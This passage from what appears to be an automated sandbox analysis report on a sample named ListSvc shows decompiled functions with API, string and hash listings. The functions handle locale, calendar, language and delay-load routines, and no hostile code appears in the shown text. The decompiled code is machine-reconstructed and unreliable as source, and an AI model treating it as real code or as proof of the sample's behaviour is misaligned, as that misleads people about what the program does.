				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}

0x0041e7cc
0x0041e7cc
0x0041e7cc
0x0041e7cd
0x0041e7cf
0x0041e7d4
0x0041e7d7
0x0041e7da
0x0041e7dd
0x0041e7e1
0x0041e7e2
0x0041e7e7
0x0041e7ea
0x0041e7ed
0x0041e7f2
0x0041e7f5
0x0041e7f9
0x0041e7f9
0x0041e80b
0x0041e812
0x0041e813
0x0041e818
0x0041e81b
0x0041e820
0x0041e826
0x0041e837
0x0041e83c
0x0041e84f
0x0041e861
0x0041e86b
0x0041e8c8
0x0041e8cb
0x0041e8d6
0x0041e8dc
0x0041e8ed
0x0041e8f2
0x0041e8ff
0x0041e90b
0x0041e90e
0x0041e913
0x0041e91a
0x0041e92d
0x0041e937
0x0041e93a
0x0041e93d
0x0041e945
0x0041e948
0x0041e957
0x0041e95c
0x0041e961
0x0041e963
0x0041e965
0x0041e965
0x0041e968
0x0041e968
0x0041e96c
0x0041e96d
0x0041e96f
0x0041e971
0x0041e976
0x0041e97f
0x0041e987
0x0041e988
0x0041e988
0x0041e988
0x0041e976
0x0041e999
0x0041e999
0x0041e86d
0x0041e87b
0x0041e880
0x0041e887
0x0041e88c
0x0041e88c
0x0041e890
0x0041e893
0x0041e895
0x0041e896
0x0041e898
0x0041e8a1
0x0041e8a9
0x0041e8aa
0x0041e8aa
0x0041e898
0x0041e8bb
0x0041e8bb
0x0041e9a3
0x0041e9a7
0x0041e9ac
0x0041e9ac
0x0041e9ae
0x0041e9c2
0x0041e9ca
0x0041e9d1
0x0041e9d6
0x0041e9d6
0x0041e9da
0x0041e9dd
0x0041e9df
0x0041e9e0
0x0041e9e2
0x0041e9e2
0x0041e9fa
0x0041ea00
0x0041ea05
0x0041ea06
0x0041ea06
0x0041e9e2
0x0041ea0e
0x0041ea14
0x0041ea19
0x0041ea20
0x0041ea25
0x0041ea25
0x0041ea27
0x0041ea2e
0x0041ea30
0x0041ea31
0x0041ea34
0x0041ea43

APIs

GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999

Strings

K, xrefs: 0041EA09
B.C., xrefs: 0041E8FA
ToA, xrefs: 0041E9BC
K, xrefs: 0041E8DD
K, xrefs: 0041E827

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CalendarEnumInfoLocaleThread
String ID: B.C.$ToA$K$K$K
API String ID: 683597275-1724967715
Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}

0x0040a255
0x0040a25a
0x0040a268
0x0040a270
0x0040a27e
0x0040a295
0x0040a2af
0x0040a2c4
0x0040a2c9
0x00000000
0x0040a2c9
0x0040a2ce

APIs

InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Strings

GetThreadPreferredUILanguages, xrefs: 0040A280
SetThreadPreferredUILanguages, xrefs: 0040A29A
kernel32.dll, xrefs: 0040A285, 0040A29F, 0040A2B9
GetThreadUILanguage, xrefs: 0040A2B4

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
API String ID: 74573329-1403180336
Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}

0x0041e0ac
0x0041e0ac
0x0041e0ad
0x0041e0af
0x0041e0b4
0x0041e0b4
0x0041e0b6
0x0041e0b8
0x0041e0b8
0x0041e0bd
0x0041e0be
0x0041e0c0
0x0041e0c4
0x0041e0c5
0x0041e0ca
0x0041e0cd
0x0041e0d3
0x0041e0d8
0x0041e0da
0x0041e0e1
0x0041e0e1
0x0041e0e9
0x0041e0ef
0x0041e0f8
0x0041e101
0x0041e10a
0x0041e11c
0x0041e126
0x0041e13b
0x0041e14a
0x0041e15d
0x0041e16c
0x0041e182
0x0041e199
0x0041e1b0
0x0041e1bf
0x0041e1d2
0x0041e1d4
0x0041e1d8
0x0041e1e9
0x0041e1f4
0x0041e1fd
0x0041e20e
0x0041e219
0x0041e22e
0x0041e242
0x0041e24d
0x0041e262
0x0041e26d
0x0041e275
0x0041e27d
0x0041e292
0x0041e29c
0x0041e2a1
0x0041e2a3
0x0041e2bc
0x0041e2a5
0x0041e2ad
0x0041e2ad
0x0041e2d1
0x0041e2db
0x0041e2e0
0x0041e2e2
0x0041e2f4
0x0041e305
0x0041e31e
0x0041e307
0x0041e30f
0x0041e30f
0x0041e305
0x0041e323
0x0041e326
0x0041e329
0x0041e32e
0x0041e339
0x0041e33e
0x0041e341
0x0041e344
0x0041e349
0x0041e354
0x0041e369
0x0041e36d
0x0041e378
0x0041e37b
0x0041e37e
0x0041e390

APIs

IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC

Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093

Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052

Strings

AMPM, xrefs: 0041E30A
ToA, xrefs: 0041E0E9
:mm:ss, xrefs: 0041E344
:mm, xrefs: 0041E329
2, xrefs: 0041E36D
AMPM , xrefs: 0041E319
mmmm d, yyyy, xrefs: 0041E202
m/d/yy, xrefs: 0041E1DD

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Locale$Info$ThreadValid
String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
API String ID: 233154393-2808312488
Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}

0x0040a7e4
0x0040a7e7
0x0040a7e9
0x0040a7ea
0x0040a7eb
0x0040a7ed
0x0040a7f1
0x0040a7f2
0x0040a7f7
0x0040a7fa
0x0040a802
0x0040a80e
0x0040a835
0x0040a83c
0x0040a84e
0x0040a857
0x0040a868
0x0040a86d
0x0040a875
0x0040a87a
0x0040a883
0x0040a883
0x0040a888
0x0040a890
0x0040a89a
0x0040a89a
0x0040a859
0x0040a85d
0x0040a85d
0x0040a857
0x0040a8a4
0x0040a8a9
0x0040a8c3
0x0040a8cd
0x0040a810
0x0040a81c
0x0040a826
0x0040a826
0x0040a8d4
0x0040a8d7
0x0040a8da
0x0040a8e7

APIs

EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD

Strings

en-US,en,, xrefs: 0040A812, 0040A8B9

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F

Uniqueness

Uniqueness Score: -1.00%

Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82
registryCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}

0x00423022
0x00423025
0x00423028
0x0042302d
0x0042302e
0x00423033
0x00423036
0x00423049
0x00423050
0x00423063
0x004230b8
0x004230c5
0x004230ce
0x004230ce
0x00423065
0x00423080
0x0042308d
0x00423096
0x00423096
0x00423080
0x004230de
0x004230e9
0x004230f4
0x004230f4
0x00423052
0x00423052
0x00423054
0x004230fa
0x004230fd
0x00423100
0x00423108
0x00423115

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096

Strings

Locale, xrefs: 00423085
.DEFAULT\Control Panel\International, xrefs: 0042306D
GetUserDefaultUILanguage, xrefs: 00423039
kernel32.dll, xrefs: 0042303E
Control Panel\Desktop\ResourceLocale, xrefs: 004230A5

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
